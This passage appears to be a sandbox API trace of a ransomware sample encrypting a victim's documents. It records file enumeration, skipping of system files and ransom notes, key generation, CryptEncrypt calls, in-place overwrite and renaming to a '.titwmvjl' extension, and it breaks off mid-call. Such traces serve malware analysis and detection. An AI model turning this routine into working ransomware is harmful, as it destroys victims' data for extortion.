(lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\XN6 EA.pdf") returned 97 [0090.749] VirtualAlloc (lpAddress=0x0, dwSize=0x102, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0090.749] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\XN6 EA.pdf.titwmvjl") returned 106 [0090.749] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\XN6 EA.pdf") returned 97 [0090.749] lstrlenW (lpString=".pdf") returned 4 [0090.749] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.749] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".pdf ") returned 5 [0090.749] lstrcmpiW (lpString1=".pdf", lpString2=".titwmvjl") returned -1 [0090.749] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.749] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\XN6 EA.pdf") returned 97 [0090.749] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\XN6 EA.pdf") returned 97 [0090.749] lstrcmpiW (lpString1="XN6 EA.pdf", lpString2="desktop.ini") returned 1 [0090.749] lstrcmpiW (lpString1="XN6 EA.pdf", lpString2="autorun.inf") returned 1 [0090.749] lstrcmpiW (lpString1="XN6 EA.pdf", lpString2="ntuser.dat") returned 1 [0090.749] lstrcmpiW (lpString1="XN6 EA.pdf", lpString2="iconcache.db") returned 1 [0090.749] lstrcmpiW (lpString1="XN6 EA.pdf", lpString2="bootsect.bak") returned 1 [0090.749] lstrcmpiW (lpString1="XN6 EA.pdf", lpString2="boot.ini") returned 1 [0090.749] lstrcmpiW (lpString1="XN6 EA.pdf", lpString2="ntuser.dat.log") returned 1 [0090.749] lstrcmpiW (lpString1="XN6 EA.pdf", lpString2="thumbs.db") returned 1 [0090.750] lstrcmpiW (lpString1="XN6 EA.pdf", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0090.750] lstrcmpiW (lpString1="XN6 EA.pdf", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0090.750] lstrcmpiW (lpString1="XN6 EA.pdf", lpString2="KRAB-DECRYPT.html") returned 1 [0090.750] lstrcmpiW (lpString1="XN6 EA.pdf", lpString2="CRAB-DECRYPT.html") returned 1 [0090.750] lstrcmpiW (lpString1="XN6 EA.pdf", lpString2="KRAB-DECRYPT.txt") returned 1 [0090.750] lstrcmpiW (lpString1="XN6 EA.pdf", lpString2="CRAB-DECRYPT.txt") returned 1 [0090.750] lstrcmpiW (lpString1="XN6 EA.pdf", lpString2="ntldr") returned 1 [0090.750] lstrcmpiW (lpString1="XN6 EA.pdf", lpString2="NTDETECT.COM") returned 1 [0090.750] lstrcmpiW (lpString1="XN6 EA.pdf", lpString2="Bootfont.bin") returned 1 [0090.750] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\XN6 EA.pdf") returned 97 [0090.750] lstrlenW (lpString=".pdf") returned 4 [0090.750] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.750] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".pdf ") returned 5 [0090.750] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.750] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.750] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\XN6 EA.pdf" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\xn6 ea.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2cc [0090.751] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.751] ReadFile (in: hFile=0x2cc, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259ea20*=0x21c, lpOverlapped=0x0) returned 1 [0090.751] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.751] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.752] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4c9980) returned 1 [0090.752] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0090.752] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0090.752] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0090.752] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e9dc | out: pbBuffer=0x259e9dc) returned 1 [0090.752] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.752] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.752] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.753] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.753] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4c9980) returned 1 [0090.753] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0090.753] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0090.753] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0090.753] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e9fc | out: pbBuffer=0x259e9fc) returned 1 [0090.754] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.754] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.754] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.754] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.754] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4c9980) returned 1 [0090.754] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.754] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x5038f8) returned 1 [0090.754] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.755] CryptGetKeyParam (in: hKey=0x5038f8, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0090.755] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.755] CryptEncrypt (in: hKey=0x5038f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259e974*=0x100) returned 1 [0090.755] GetLastError () returned 0x0 [0090.755] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.755] CryptDestroyKey (hKey=0x5038f8) returned 1 [0090.755] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.755] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.755] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.755] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4c9980) returned 1 [0090.756] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.756] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x5036f8) returned 1 [0090.756] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.756] CryptGetKeyParam (in: hKey=0x5036f8, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0090.756] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.756] CryptEncrypt (in: hKey=0x5036f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259e974*=0x100) returned 1 [0090.756] GetLastError () returned 0x0 [0090.757] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.757] CryptDestroyKey (hKey=0x5036f8) returned 1 [0090.757] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.757] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.757] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0090.757] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0090.757] ReadFile (in: hFile=0x2cc, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ea20*=0x17400, lpOverlapped=0x0) returned 1 [0090.764] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xfffe8c00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.764] WriteFile (in: hFile=0x2cc, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x17400, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ea04*=0x17400, lpOverlapped=0x0) returned 1 [0090.766] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.766] WriteFile (in: hFile=0x2cc, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259ea04*=0x21c, lpOverlapped=0x0) returned 1 [0090.767] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.770] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.771] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.771] CloseHandle (hObject=0x2cc) returned 1 [0090.771] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\XN6 EA.pdf" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\xn6 ea.pdf"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\XN6 EA.pdf.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\xn6 ea.pdf.titwmvjl"), dwFlags=0x1) returned 1 [0090.772] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.772] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 0 [0090.773] FindClose (in: hFindFile=0x503638 | out: hFindFile=0x503638) returned 1 [0090.774] CloseHandle (hObject=0x2c4) returned 1 [0090.774] FindNextFileW (in: hFindFile=0x503838, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0090.774] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0090.774] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0090.774] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\d2ca4a09d2ca4deb61a.lock" [0090.774] lstrlenW (lpString=".titwmvjl") returned 9 [0090.774] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\d2ca4a09d2ca4deb61a.lock") returned 95 [0090.774] VirtualAlloc (lpAddress=0x0, dwSize=0xfe, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0090.774] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 104 [0090.774] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\d2ca4a09d2ca4deb61a.lock") returned 95 [0090.774] lstrlenW (lpString=".lock") returned 5 [0090.774] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.774] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0090.774] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.775] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.775] FindNextFileW (in: hFindFile=0x503838, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0090.775] lstrcmpW (lpString1="PGPibvMt.pps", lpString2=".") returned 1 [0090.775] lstrcmpW (lpString1="PGPibvMt.pps", lpString2="..") returned 1 [0090.775] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\", lpString2="PGPibvMt.pps" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\PGPibvMt.pps") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\PGPibvMt.pps" [0090.775] lstrlenW (lpString=".titwmvjl") returned 9 [0090.775] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\PGPibvMt.pps") returned 83 [0090.775] VirtualAlloc (lpAddress=0x0, dwSize=0xe6, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0090.775] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\PGPibvMt.pps.titwmvjl") returned 92 [0090.775] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\PGPibvMt.pps") returned 83 [0090.775] lstrlenW (lpString=".pps") returned 4 [0090.775] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.775] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".pps ") returned 5 [0090.775] lstrcmpiW (lpString1=".pps", lpString2=".titwmvjl") returned -1 [0090.775] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.776] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\PGPibvMt.pps") returned 83 [0090.776] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\PGPibvMt.pps") returned 83 [0090.776] lstrcmpiW (lpString1="PGPibvMt.pps", lpString2="desktop.ini") returned 1 [0090.776] lstrcmpiW (lpString1="PGPibvMt.pps", lpString2="autorun.inf") returned 1 [0090.776] lstrcmpiW (lpString1="PGPibvMt.pps", lpString2="ntuser.dat") returned 1 [0090.776] lstrcmpiW (lpString1="PGPibvMt.pps", lpString2="iconcache.db") returned 1 [0090.776] lstrcmpiW (lpString1="PGPibvMt.pps", lpString2="bootsect.bak") returned 1 [0090.776] lstrcmpiW (lpString1="PGPibvMt.pps", lpString2="boot.ini") returned 1 [0090.776] lstrcmpiW (lpString1="PGPibvMt.pps", lpString2="ntuser.dat.log") returned 1 [0090.776] lstrcmpiW (lpString1="PGPibvMt.pps", lpString2="thumbs.db") returned -1 [0090.776] lstrcmpiW (lpString1="PGPibvMt.pps", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0090.776] lstrcmpiW (lpString1="PGPibvMt.pps", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0090.776] lstrcmpiW (lpString1="PGPibvMt.pps", lpString2="KRAB-DECRYPT.html") returned 1 [0090.776] lstrcmpiW (lpString1="PGPibvMt.pps", lpString2="CRAB-DECRYPT.html") returned 1 [0090.776] lstrcmpiW (lpString1="PGPibvMt.pps", lpString2="KRAB-DECRYPT.txt") returned 1 [0090.776] lstrcmpiW (lpString1="PGPibvMt.pps", lpString2="CRAB-DECRYPT.txt") returned 1 [0090.776] lstrcmpiW (lpString1="PGPibvMt.pps", lpString2="ntldr") returned 1 [0090.776] lstrcmpiW (lpString1="PGPibvMt.pps", lpString2="NTDETECT.COM") returned 1 [0090.776] lstrcmpiW (lpString1="PGPibvMt.pps", lpString2="Bootfont.bin") returned 1 [0090.776] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\PGPibvMt.pps") returned 83 [0090.776] lstrlenW (lpString=".pps") returned 4 [0090.776] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.776] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".pps ") returned 5 [0090.777] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.777] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.777] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\PGPibvMt.pps" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\pgpibvmt.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2c4 [0090.778] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.778] ReadFile (in: hFile=0x2c4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259ecb4*=0x21c, lpOverlapped=0x0) returned 1 [0090.778] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.779] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.779] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4c9980) returned 1 [0090.779] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0090.779] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0090.779] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0090.779] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259ec70 | out: pbBuffer=0x259ec70) returned 1 [0090.779] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.780] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.780] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.780] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.780] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4c9980) returned 1 [0090.780] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0090.780] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0090.781] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0090.781] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259ec90 | out: pbBuffer=0x259ec90) returned 1 [0090.781] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.781] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.781] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.781] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.781] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4c9980) returned 1 [0090.781] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.781] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x503338) returned 1 [0090.782] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.782] CryptGetKeyParam (in: hKey=0x503338, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0090.782] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.782] CryptEncrypt (in: hKey=0x503338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259ec08*=0x100) returned 1 [0090.782] GetLastError () returned 0x0 [0090.782] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.782] CryptDestroyKey (hKey=0x503338) returned 1 [0090.782] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.783] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.783] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.783] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4c9980) returned 1 [0090.783] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.783] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x503278) returned 1 [0090.783] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.783] CryptGetKeyParam (in: hKey=0x503278, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0090.783] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.784] CryptEncrypt (in: hKey=0x503278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259ec08*=0x100) returned 1 [0090.784] GetLastError () returned 0x0 [0090.784] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.784] CryptDestroyKey (hKey=0x503278) returned 1 [0090.784] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.784] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.784] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0090.784] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0090.784] ReadFile (in: hFile=0x2c4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ecb4*=0x16d14, lpOverlapped=0x0) returned 1 [0090.791] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfffe92ec, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.791] WriteFile (in: hFile=0x2c4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x16d14, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ec98*=0x16d14, lpOverlapped=0x0) returned 1 [0090.793] WriteFile (in: hFile=0x2c4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259ec98*=0x21c, lpOverlapped=0x0) returned 1 [0090.794] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.798] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.798] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.798] CloseHandle (hObject=0x2c4) returned 1 [0090.799] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\PGPibvMt.pps" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\pgpibvmt.pps"), 